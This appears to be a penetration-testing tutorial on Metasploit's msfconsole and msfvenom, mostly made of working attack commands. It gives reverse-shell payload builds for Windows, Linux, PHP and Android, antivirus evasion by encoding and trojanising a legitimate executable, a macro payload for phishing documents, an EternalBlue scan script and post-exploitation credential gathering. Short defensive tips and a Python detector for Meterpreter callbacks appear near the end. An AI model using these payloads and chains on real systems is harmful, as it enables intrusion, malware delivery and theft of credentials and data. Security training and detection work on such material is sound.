Mastering msfconsole and msfvenom for sophisticated attack chains and payload generation.

The Metasploit Framework remains the most comprehensive exploitation toolkit available. Advanced usage goes far beyond basic exploit execution.

Advanced Msfconsole Operations:

# Database integration for results tracking
msfdb init
msfconsole -q

# Advanced module searching
search type:exploit platform:windows target:2008

# Resource scripts for automation
cat > automation.rc << EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.0/24
# THREADS is only read by auxiliary scanner modules; this exploit ignores it
set THREADS 10
run
EOF
msfconsole -r automation.rc

Msfvenom Payload Generation Mastery:

# Windows reverse shell with evasion
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 3 -o payload.exe

# Linux payloads (LHOST may be an interface name such as tun0)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f elf > shell.elf

# Web payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php

# Android applications
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o malicious.apk

# Custom encoding and format
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 -f c -e x86/alpha_mixed

Post-Exploitation Automation:

# Meterpreter resource scripts
cat > post_exploit.rc << EOF
# credential modules live under post/windows/gather/credentials/; name one explicitly
run post/windows/gather/credentials/<module>
# screenshot is a built-in Meterpreter command, not a post module
screenshot
run post/windows/gather/enum_logged_on_users
run post/windows/manage/migrate
EOF

# Load in meterpreter session
meterpreter > resource post_exploit.rc

Advanced Exploitation Chains:

  • Web Application → System Compromise:
    1. Upload web shell via file upload vulnerability
    2. Use web_delivery module for staged payload
    3. Establish Meterpreter session
    4. Privilege escalation via local exploits
  • Network Service → Lateral Movement:
    1. Exploit vulnerable network service
    2. Dump credentials with hashdump
    3. Pass-the-hash to other systems
    4. Pivot through compromised hosts

Evasion and Anti-Virus Bypass:

# Custom payload encoding, injected into an existing executable as template (-x) while keeping its behaviour (-k)
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -e x86/shikata_ga_nai -i 5 -x legit.exe -k -o malicious.exe

# Template injection for document attacks
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f vba-exe

Real-World Red Team Operation:

During a recent engagement, we successfully compromised a corporate network:

  1. Phishing email with weaponized document (msfvenom)
  2. Initial foothold with Meterpreter session
  3. Lateral movement using psexec and stolen credentials
  4. Domain privilege escalation via token impersonation
  5. Data exfiltration through encrypted channels

Defensive Recommendations:

  • Implement application whitelisting
  • Use endpoint detection and response (EDR) solutions
  • Monitor for Meterpreter signatures and behaviors
  • Regularly patch vulnerable software
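As an added example (not part of the original article), the following Python heuristic turns the "monitor for Meterpreter behaviors" item into something you can run over connection records: it flags callbacks to Metasploit's default LPORT 4444, which every one-liner above uses, and the staged-payload pattern in which a client sends a few bytes and immediately receives a large blob (the stage) from its handler. The record format, the byte thresholds and the sample addresses are all constructed assumptions.

```python
# Heuristic review of outbound connection records for the Meterpreter
# behaviours listed above. Added example: the record format
# (ts,src,dst,dport,orig_bytes,resp_bytes), thresholds and addresses are
# constructed assumptions, not a vendor or project signature.
from dataclasses import dataclass

# 4444 is Metasploit's default LPORT and the one the article's one-liners use.
DEFAULT_LPORTS = {4444}
# A staged reverse_tcp stager sends almost nothing, then pulls the full
# Meterpreter stage (hundreds of KB) from the handler. Thresholds are assumptions.
STAGE_MAX_ORIG_BYTES = 2_000
STAGE_MIN_RESP_BYTES = 100_000

@dataclass
class Finding:
    src: str
    dst: str
    dport: int
    reason: str

def parse_record(line):
    ts, src, dst, dport, orig_b, resp_b = line.split(",")
    return ts, src, dst, int(dport), int(orig_b), int(resp_b)

def review(lines):
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _ts, src, dst, dport, orig_b, resp_b = parse_record(line)
        if dport in DEFAULT_LPORTS:
            findings.append(Finding(src, dst, dport, "default Metasploit LPORT"))
        if orig_b <= STAGE_MAX_ORIG_BYTES and resp_b >= STAGE_MIN_RESP_BYTES:
            findings.append(Finding(src, dst, dport, "staged-payload download pattern"))
    return findings

# Constructed sample: record 2 looks like a staged callback hiding on 443,
# record 3 uses the default port 4444; records 1 and 4 are ordinary browsing.
SAMPLE_LOG = """\
# ts,src,dst,dport,orig_bytes,resp_bytes
1700000001,10.0.0.5,203.0.113.10,443,5120,48000
1700000002,10.0.0.7,198.51.100.20,443,312,184000
1700000003,10.0.0.9,198.51.100.20,4444,900,176000
1700000004,10.0.0.5,203.0.113.10,80,700,2100
"""

if __name__ == "__main__":
    for f in review(SAMPLE_LOG.splitlines()):
        print(f"{f.src} -> {f.dst}:{f.dport}  {f.reason}")
```

The staged-download heuristic is deliberately port-agnostic, so it still fires when an operator moves the handler to 443 as in the reverse_https example above.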

Key Takeaways

  • Implement proper authorization and authentication
  • Regular security assessments and penetration testing
  • Stay updated with latest security threats and patches
  • Follow ethical hacking principles and responsible disclosure

Pro Tip

Always conduct security testing in authorized environments only and follow responsible disclosure practices.